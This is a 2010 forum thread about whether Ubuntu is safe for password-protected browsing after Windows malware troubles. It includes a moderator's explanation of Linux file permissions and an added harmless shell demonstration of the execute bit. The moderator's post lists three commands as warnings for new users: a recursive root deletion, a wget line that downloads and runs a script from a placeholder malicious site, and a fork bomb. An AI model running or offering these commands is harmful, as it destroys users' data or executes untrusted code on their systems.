Linux Security Question

#1 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:02:17 AM

Posted 10 January 2010 - 12:05 AM

Hello Everyone. So I have finally had it with everything Microsoft. I have several computers all running various versions of Windows. I find that I spend 80% of my time fixing malware, viruses, Trojans, bots, bugs, B.S.O.D errors etc, etc and the remaining 20% of my time is spent helping others fix all their problems with Windows. This leaves me 0% of my time to actually do any useful computing. I know all you who have switched from Windows to Linux can relate. The final straw for me was when my brand new laptop came up infected after about 5 minutes of use (Yes, I had anti virus, MBAM, SAS, etc installed from a clean flash drive before I even plugged into the Internet). In light of all this I loaded Ubuntu 9.10 onto one of my laptops and started familiarizing myself with it. I am using the GUI as well as the command line for the basics and feel pretty comfortable doing so.
My question is this. I am really having a hard time feeling comfortable with going to password protected sites and doing secure computing with Linux. I have installed Firestarter and configured my firewall and also installed Clam AV. I am using Firefox as my browser. I know you guys are all going to tell me that Linux is exponentially safer than Windows and there are very few viruses in the wild in Linux but I guess I need to hear some experts tell me it's ok before I feel comfortable typing in passwords etc. Can some of you Linux experts PLEASE give me some peace of mind about the security of Linux so I never have to turn on my computer and see a Windows boot screen ever again? Thanks in advance for any help/comments you can provide.

Signed,
Sick of Windows

"DO OR DO NOT. THERE IS NO TRY."



#2 MadDawg

MadDawg

  • Members
  • 453 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Houston, TX
  • Local time:03:17 AM

Posted 10 January 2010 - 12:55 AM

Linux is indeed a lot safer than Windows. The only thing I would recommend now is installing NoScript for Firefox.

EDIT: If you choose to install NoScript, I highly recommend that you whitelist any online stores you use (if any) in order to avoid being double-charged for purchases.

Edited by MadDawg, 10 January 2010 - 01:02 AM.

A penguin broke my windows with a half-eaten apple!

#3 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,258 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Right behind you
  • Local time:01:17 AM

Posted 10 January 2010 - 05:28 AM

Linux is indeed safer by virtue of its multi-user design philosophy. Installing ClamAV, or indeed any antivirus program, in Linux is probably not going to add any protection. This is because the AV programs written to run on Linux are primarily aimed at systems that serve files to Windows clients (mail, http, file sharing servers, etc.)

Your question is one that is prototypical of someone still reeling from their experiences under Windows: keyloggers, spyware, bots, rootkits, etc. all trying to steal your passwords and credit card number. While it is true that the crooks still want that information, if you're running Linux then it gets a whole lot harder.

The best way, I think, of describing the situation is that Linux does what the user asks it to whereas Windows attempts to predict what the user wants. This, in and of itself, is not a bad thing. But the resulting design decisions were made with that goal in mind rather than one of security. For example: in Linux systems, no file is considered to be executable unless it is explicitly marked as such; in Windows, any file ending in EXE, SCR, COM, BAT, CMD, PIF, DLL, OCX, DRV, SYS, or CPL is considered to contain executable content and will be executed automatically when the file is launched no matter what's actually inside of it or where it came from. So, while you can e-mail an EXE file to someone running Windows and Windows will execute the program immediately if the user double-clicks on it, you'd have a more difficult time getting that same user in Linux to cause the program to be executed. They would need to explicitly change the file's permissions.

As for network-related security, that is transmitting data over the internet, Linux conforms to the same standards which Microsoft (sometimes) does. SSL runs out of the box with any and all browsers that run on Linux (assuming the browser itself supports SSL, which all modern browsers do.)

The long and short of it is that, yes, Linux is by default more secure than Windows is. However, the security it provides does not give the user license to be stupid. There are just as many ways to destroy a Linux system as there are ways to nuke Windows. So it behooves the user to always think about what they're doing before doing it.

For example: if you browse through any Linux support forum (like ubuntuforums.org) you will no doubt see people recommending the execution of a certain command in the terminal. While 99% of the time the advice is sound (or at least not dangerous) there are some people who think it's funny to instruct new users to execute destructive commands, download tainted programs, or do other such malicious things. If you don't understand what a command does (at least in principle) then ask for clarification. If someone says you should download a file from some unknown website, make it executable, and run it, then ask yourself whether you trust the person giving the advice.

Examples of some potentially malicious commands (DO NOT RUN THESE!)

sudo rm -rf /
Tries to recursively delete your entire system

wget http://somebadsite.net/maliciousCode.sh && chmod +x maliciousCode.sh && ./maliciousCode.sh
downloads, makes executable, then runs the file maliciousCode.sh

:(){ :|:& };:
a fork bomb



If you skipped all that, then just read this: a computer is only as secure as the user's least secure action.

Edited by Andrew, 07 April 2010 - 09:47 PM.
Decrapified URLification
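
The execute-bit behaviour described in post #3, as an added example that is not part of the thread: a file saved without the execute bit cannot be launched directly (exit status 126), but handing it to an interpreter still runs it, so reviewing a script before running it matters more than its permission bits. The file name `sample.sh` and all function names are constructed for illustration, and everything happens in a temporary directory.

```shell
#!/bin/sh
# Added example (constructed): what the execute bit does and does not prevent.

# Write a harmless script the way a saved attachment lands: mode 644, no x bit.
make_sample() {
    printf '#!/bin/sh\necho "sample ran"\n' > "$1/sample.sh"
    chmod 644 "$1/sample.sh"
}

# Launch a file directly and print the exit status.
# 126 is the shell's status for "found, but not executable".
try_exec() {
    if "$1" >/dev/null 2>&1; then echo 0; else echo $?; fi
}

# Pass the same file to an interpreter instead. The interpreter only needs
# read permission, so the missing execute bit does not stop this.
try_via_sh() {
    if sh "$1" >/dev/null 2>&1; then echo 0; else echo $?; fi
}

# Audit helper: list regular files under a directory with any execute bit set
# (owner, group or other). Useful for checking a downloads folder.
list_executables() {
    find "$1" -type f \( -perm -100 -o -perm -010 -o -perm -001 \) 2>/dev/null | sort
}

# Demonstration in a throwaway directory.
demo_dir=$(mktemp -d)
make_sample "$demo_dir"
echo "direct launch, mode 644:   exit $(try_exec "$demo_dir/sample.sh")"
echo "via interpreter, mode 644: exit $(try_via_sh "$demo_dir/sample.sh")"
echo "executables before chmod:  $(list_executables "$demo_dir" | wc -l)"
chmod u+x "$demo_dir/sample.sh"
echo "executables after chmod:   $(list_executables "$demo_dir")"
rm -rf "$demo_dir"
```
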


#4 Johnny Computer

Johnny Computer
  • Topic Starter

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:02:17 AM

Posted 10 January 2010 - 12:52 PM

Thanks to both of you for your replies. The information was very helpful. Appreciate it. :thumbsup: :flowers:

"DO OR DO NOT. THERE IS NO TRY."
